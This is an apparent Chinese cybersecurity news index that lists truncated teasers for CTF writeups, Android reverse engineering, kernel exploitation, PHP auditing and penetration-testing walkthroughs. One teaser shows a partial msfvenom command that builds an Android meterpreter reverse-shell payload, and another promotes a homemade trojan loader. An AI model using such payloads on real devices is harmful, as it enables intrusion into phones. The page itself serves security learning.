更多全球网络安全资讯尽在邑安全这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black t...
安卓应用层协议/框架通杀抓包:实战篇
0x00.前言(文章分为实战和源码分析,本文为实战篇)环境和工具准备:kali-linuxpython 3.xr0capturefrida / frida-toolsapkshell0x01.什么是 ...
利用msf框架对安卓手机进行简单操作
测试机型红米k30 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 R > vir...
巧用APP历史版本对APP登录signature分析
前言 之前在火线zone看到利用app历史版本来进行app的逆向分析,可以降低一下分析难度,比较老版本的安全防护做的不是很到位。正好最近有一个app,尝试利用一下老版本进行分析登录签名,没想到效果非常...
painLoader 加载器(无疫烦)
开发这款木马加载器(PainLoader)的初衷是我最近这段时间闲的蛋疼。其实主要是最近这段时间自己经历了一些比较难受的事情(Emm,说实话,很难受),为了转移自己的注意力,让自己能稍微缓一缓(但是,...
游戏检测的对抗与防御艺术丨咖面114期
漏洞银行技术群:327085041每周五晚20:00 “大咖面对面”技术直播近日河南郑州新乡等城市的洪水,牵动无数人的心我们看到许多表哥用自己的方式为河南祈福也看到在灾难中无私助人的英雄愿...
Android Linker详解
看雪论坛作者ID:r0ysue1简介接上篇Linker源码详解(一),本文继续来分析Linker的链接过程。为了更好的理解Unidbg的原理,我们需要了解很多细节。虽然一个模拟二进制执行框架的弊端很多...
内核缓冲区溢出1--无保护
介绍 参考 https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/ 文件下载地址kernel-rop-bf9c106d459...
变量覆盖漏洞
变量覆盖漏洞大多由函数使用不当导致,经常引发变量覆盖漏洞的函数有:extract()函数和parse_str(),import_request_variables()函数则是用在没有开启全局变量注册的...
vulnhub-hackeme2
靶机描述 'hackme2' is a medium difficulty level box. This is the second part of the hackme series where ...
php审计学习
``` 前言 我好菜。记录一下学习php审计的过程。 需要工具 VsCode Seay源代码审计系统 (更多…)
HackTheBox-Linux-CTF
一个每日分享渗透小技巧的公众号大家好,这里是 大余安全 的第 149 篇文章,本公众号会每日分享攻防渗透技术给大家。靶机地址:https://www.hackt...
862